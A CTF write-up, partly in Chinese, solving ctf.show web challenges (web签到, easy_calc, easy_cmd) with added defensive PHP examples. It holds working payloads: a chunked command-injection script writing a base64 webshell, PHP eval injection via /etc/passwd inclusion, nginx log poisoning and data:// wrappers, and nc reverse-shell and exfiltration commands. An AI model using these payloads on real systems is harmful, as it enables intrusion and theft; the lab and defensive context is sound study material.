web签到 (web check-in)
View the source:
<form class="form-horizontal" role="form" action="api/tools.php" method="post" onsubmit="return check();">
  <div class="form-group">
    <label for="command" class="col-lg-2 col-sm-2 control-label">命令</label>
    <div class="col-lg-10">
      <input onchange="help();" id="cmd" name="cmd" type="text" class="form-control" placeholder="ls">
      <p id="help" class="help-block">仅支持较短命令执行,且不会回显。</p>

<script>
function help(){
    if(isSafe($("#cmd").val())){
        $("#help").css("color","#69cf56");
        $("#help").html("提交命令执行");
    }else{
        $("#help").css("color","#ec1616");
        $("#help").html("命令字符过长");
    }
}
// The only length check on the whole page: it runs in the browser.
function isSafe(cmd) {
    return cmd.length<=7;
}
function check(){
    if(isSafe($("#cmd").val())){
        $("#help").css("color","#69cf56");
        $("#help").html("提交命令执行");
        return true;
    }else{
        $("#help").css("color","#ec1616");
        $("#help").html("命令字符过长");
        return false;
    }
}
</script>
The length check lives only in the page's JavaScript, so request api/tools.php directly and POST the cmd parameter.
cmd=ls />r, then open /api/r
The response is served as a file download whose content is:
bin dev etc flag home lib media mnt opt proc root run sbin srv sys tmp usr var
Write a new shell to api/1.php.
PoC:
payload.txt:
>hp
>1.p\\
>d\>\\
>\ -\\
>e64\\
>bas\\
>7\|\\
>XSk\\
>Fsx\\
>dFV\\
>kX0\\
>bCg\\
>XZh\\
>AgZ\\
>waH\\
>PD9\\
>o\ \\
>ech\\
ls -t>0
sh 0

import requests
import time

url = "http://dcc8e9ff-aadd-45ce-a3a4-f26a75c6d0c1.challenge.ctf.show/api/tools.php"

# Send each line of payload.txt as one cmd value, in file order.
with open("payload.txt", "r") as f:
    for i in f:
        data = {"cmd": i.strip()}
        r = requests.post(url=url, data=data)
        time.sleep(1)
        print(r.text)

# Check whether the new file was created.
test = requests.get("http://dcc8e9ff-aadd-45ce-a3a4-f26a75c6d0c1.challenge.ctf.show/api/1.php")
if test.status_code == requests.codes.ok:
    print("you've got it!")
Open /api/1.php to execute commands and read the flag.
The nl command also works directly:
nl /*>m
easy_calc
<?php
if(check($code)){
    // $code is built from POST data and evaluated as PHP
    eval('$result='."$code".";");
    echo($result);
}
function check(&$code){
    $num1=$_POST['num1'];
    $symbol=$_POST['symbol'];
    $num2=$_POST['num2'];
    if(!isset($num1) || !isset($num2) || !isset($symbol) ) {
        return false;
    }
    // character blacklist applied to the concatenated input
    if(preg_match("/!|@|#|\\$|\%|\^|\&|\(|_|=|{|'|<|>|\?|\?|\||`|~|\[/", $num1.$num2.$symbol)) {
        return false;
    }
    if(preg_match("/^[\+\-\*\/]$/", $symbol)) {
        $code = "$num1$symbol$num2";
        return true;
    }
    return false;
}
POST /calc.php HTTP/1.1
Host: b620b5e8-29f2-4d3d-bf47-0d5d915a9d0a.challenge.ctf.show
Content-Length: 24
Pragma: no-cache
Cache-Control: no-cache
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://b620b5e8-29f2-4d3d-bf47-0d5d915a9d0a.challenge.ctf.show
Referer: http://b620b5e8-29f2-4d3d-bf47-0d5d915a9d0a.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

num1=1&symbol=%2B&num2=3
The statement that finally runs is the concatenation $num1$symbol$num2. Since ( is filtered, no function can be called, so what is left are language constructs such as include, require and echo; so try including a file.
Testing in a local environment:
$num1='include "C:\Users\admin\Desktop\ip.txt";1';
$symbol="+";
$num2="2";
ip.txt is echoed back successfully.
num1=include "/etc/passwd";1&symbol=%2B&num2=2
/etc/passwd is echoed back successfully.
Log inclusion
num1=include "/var/log/nginx/access.log";1&symbol=%2B&num2=2
Final request:
POST /calc.php HTTP/1.1
Host: a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Content-Length: 60
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: <?php system('cat /*'); ?>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Referer: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

num1=include "/var/log/nginx/access.log";1&symbol=%2B&num2=2
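From the defender's side, the poisoned User-Agent above is written to the access log whether or not the include that would execute it ever happens, so the log itself is the detection point. The PHP below is an example added for this page, not the challenge's code: it parses nginx combined-format lines and flags entries that carry a PHP open tag in any client-controlled field or a stream wrapper in the request line. The sample lines are constructed; the second one copies the User-Agent from the request above.

```php
<?php
// Added example, not the challenge's code: scan nginx combined-format access log
// lines for the traces a log-poisoning attempt leaves, whether or not the
// include that would execute it ever happens.

// Constructed sample lines. The second copies the User-Agent from the request
// above; the first and third are ordinary traffic.
$sample_log = <<<'LOG'
10.0.0.5 - - [01/May/2023:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.9 - - [01/May/2023:10:00:07 +0000] "POST /calc.php HTTP/1.1" 200 88 "http://app.example/" "<?php system('cat /*'); ?>"
10.0.0.5 - - [01/May/2023:10:00:09 +0000] "POST /calc.php HTTP/1.1" 200 3 "http://app.example/" "curl/8.0.1"
LOG;

// Parse one combined-format line into named fields; null if it does not match.
function parse_combined(string $line): ?array {
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return [
        'ip'      => $m[1],
        'time'    => $m[2],
        'request' => $m[3],
        'status'  => (int) $m[4],
        'referer' => $m[6],
        'ua'      => $m[7],
    ];
}

// Indicators worth alerting on: a PHP open tag in any client-controlled field
// (request line, Referer and User-Agent all end up in the log), or a stream
// wrapper in the request line, since data:// is how the page reaches eval().
function poisoning_indicators(array $entry): array {
    $hits = [];
    foreach (['request', 'referer', 'ua'] as $field) {
        if (preg_match('/<\?(php|=)?/i', $entry[$field])) {
            $hits[] = "php-open-tag-in-$field";
        }
    }
    if (preg_match('~\b(data|php|phar|expect)://~i', $entry['request'])) {
        $hits[] = 'stream-wrapper-in-request';
    }
    return $hits;
}

// One alert per matching line: source IP, timestamp and the indicators hit.
function scan_log(string $log): array {
    $alerts = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $entry = parse_combined($line);
        if ($entry === null) {
            continue;                 // malformed line: skip rather than crash
        }
        $hits = poisoning_indicators($entry);
        if ($hits !== []) {
            $alerts[] = ['ip' => $entry['ip'], 'time' => $entry['time'], 'indicators' => $hits];
        }
    }
    return $alerts;
}

print_r(scan_log($sample_log));
```

Only the second sample line produces an alert (the PHP open tag in the User-Agent field); feeding the same function a real log file line by line gives the source IP and timestamp to pivot on, and the request-line wrapper check catches the data:// form when it arrives in a query string rather than a POST body.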
Code execution via the data:// wrapper
<?php eval($_GET[1]);
PD9waHAgZXZhbCgkX0dFVFsxXSk7
The closing ?> is dropped here so that the base64 string does not end in a +, which would otherwise be decoded as a space in the form body.
payload:
num1=1;include "data://text/plain;base64,PD9waHAgZXZhbCgkX0dFVFsxXSk7";1&symbol=/&num2=1
POST /calc.php?1=system('cat+/secret')%3b HTTP/1.1
Host: a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Content-Length: 88
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show
Referer: http://a44f634b-1a68-47d0-98de-d40c9d04416b.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

num1=1;include "data://text/plain;base64,PD9waHAgZXZhbCgkX0dFVFsxXSk7";1&symbol=/&num2=1
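The root cause of easy_calc, with an added example that is not the challenge's code: the check is a character blacklist applied in front of eval(), and a blacklist cannot enumerate every dangerous construct (include, ;, " and the data:// wrapper all pass it). The hardened version below validates both operands as numbers, picks the operator from a fixed switch and never calls eval(); the blacklist function is the page's own regex reduced to a function so the two can be compared side by side, and the inputs are constructed from this writeup. Separately, include of a data:// URL only works with allow_url_include=On, so leaving that directive at its default Off would have closed the second path on its own.

```php
<?php
// Added example, not the challenge's code: the page's blacklist check beside an
// allowlist calculator that never reaches eval().

// The challenge's filter reduced to a function. It blocks a list of characters
// but leaves ; " and whole keywords such as include untouched.
function blacklist_passes(string $num1, string $symbol, string $num2): bool {
    if (preg_match("/!|@|#|\\$|\%|\^|\&|\(|_|=|{|'|<|>|\?|\?|\||`|~|\[/", $num1.$num2.$symbol)) {
        return false;
    }
    return preg_match("/^[\+\-\*\/]$/", $symbol) === 1;
}

// Hardened calculator: operands must validate as plain numbers, the operator is
// matched against a fixed set, and PHP does the arithmetic itself.
function calc_safe(string $num1, string $symbol, string $num2): ?float {
    $a = filter_var($num1, FILTER_VALIDATE_FLOAT);
    $b = filter_var($num2, FILTER_VALIDATE_FLOAT);
    if ($a === false || $b === false) {
        return null;                  // not a number: rejected before any evaluation
    }
    switch ($symbol) {
        case '+': return $a + $b;
        case '-': return $a - $b;
        case '*': return $a * $b;
        case '/': return $b == 0.0 ? null : $a / $b;   // refuse division by zero
        default:  return null;         // operator outside the fixed set
    }
}

// Constructed inputs: the two payloads from this writeup and an ordinary sum.
$inputs = [
    ['include "/etc/passwd";1', '+', '2'],
    ['1;include "data://text/plain;base64,PD9waHAgZXZhbCgkX0dFVFsxXSk7";1', '/', '1'],
    ['1', '+', '3'],
];
foreach ($inputs as [$n1, $sym, $n2]) {
    printf("%-72s blacklist:%s  allowlist:%s\n",
        $n1 . $sym . $n2,
        blacklist_passes($n1, $sym, $n2) ? 'pass' : 'block',
        calc_safe($n1, $sym, $n2) === null ? 'reject' : 'ok');
}
```

Both include payloads pass the blacklist (none of the blocked characters appear in them) and are rejected by the allowlist, while 1+3 goes through both; the difference is that the allowlist describes the only input shape the feature needs rather than guessing at what an attacker might send.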
easy_cmd
<?php
error_reporting(0);
highlight_file(__FILE__);
$cmd=$_POST['cmd'];
if(preg_match("/^\b(ping|ls|nc|ifconfig)\b/",$cmd)){
    exec(escapeshellcmd($cmd));
}
?>
The regex requires the submitted cmd to begin with ping, ls, nc or ifconfig; the command is then passed through escapeshellcmd before exec.
<?php
$cmd="nc -e /bin/bash ip port";
if(preg_match("/^\b(ping|ls|nc|ifconfig|ipconfig)\b/",$cmd)) {
    $out=escapeshellcmd($cmd);
    print_r($out);
}
nc -e /bin/bash ip port
Here escapeshellcmd turns out not to change the command at all: it only escapes shell metacharacters, and this string contains none.
So try a reverse shell with nc:
nc -e /bin/bash ip port
nc ip port -e /bin/bash
The shell drops a second after connecting, so instead use nc to carry command output out:
cmd=nc IP port -e ls /
cmd=nc IP port -e cat /secret
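Defensive wrap-up for web签到 and easy_cmd, as an added example rather than code from either challenge: in web签到 the only length check ran in the browser, and in easy_cmd escapeshellcmd() leaves the arguments of an allowed command untouched, so a prefix match plus escapeshellcmd() says nothing about what the command does. The PHP below first shows escapeshellcmd() returning the page's nc line unchanged, then an endpoint shape where the binary and flags are fixed in code, the user supplies only a host validated against an IP/hostname allowlist, and the process is started through proc_open() with an argument array so no shell parses the input at all. The function names, the ping flags and the sample inputs are choices made for this example.

```php
<?php
// Added example, not the challenges' code. First: escapeshellcmd() leaves an
// allowed-prefix command's arguments intact. Then: an endpoint shape where the
// server, not the browser, decides what runs, and user input is never parsed
// by a shell. Function names and the ping flags are choices made here.

// escapeshellcmd() only escapes shell metacharacters; the -e flag and the
// target in the page's nc line contain none, so the string comes back as-is.
function escaped_unchanged(string $cmd): bool {
    return escapeshellcmd($cmd) === $cmd;
}

// Server-side allowlist for the one variable the feature needs: a host that is
// either a valid IP address or a plain hostname. Anything else is refused.
function valid_host(string $host): bool {
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    $label = '[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?';
    return strlen($host) <= 253
        && preg_match("/^{$label}(\\.{$label})*$/i", $host) === 1;
}

// Shell-based variant: binary path and flags are fixed in code, and the only
// user-controlled token is wrapped by escapeshellarg() as a single argument.
function build_ping_cmd(string $host): ?string {
    if (!valid_host($host)) {
        return null;
    }
    return '/bin/ping -c 1 -W 2 ' . escapeshellarg($host);
}

// Shell-free variant (PHP >= 7.4): proc_open() with an argument array executes
// the program directly, so there is no shell to interpret ; | > or backticks.
function run_ping(string $host): ?string {
    if (!valid_host($host)) {
        return null;
    }
    $spec = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open(['/bin/ping', '-c', '1', '-W', '2', $host], $spec, $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($proc);
    return $out;
}

// Constructed inputs: the page's nc line, a host carrying shell metacharacters,
// and a plain hostname.
var_dump(escaped_unchanged('nc -e /bin/bash ip port'));
var_dump(build_ping_cmd('127.0.0.1; ls /'));
var_dump(build_ping_cmd('example.com'));
```

The first call confirms the page's observation that escapeshellcmd() is a no-op on that string; the second is refused by the allowlist before any command is built, and only the third yields a command line. The 7-character trick from web签到 shows why a length cap is not a control either: the server must restrict what runs, not how much is typed.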
easy_sql
SQL injection. First fuzzed which keywords the WAF blocks; not solved yet.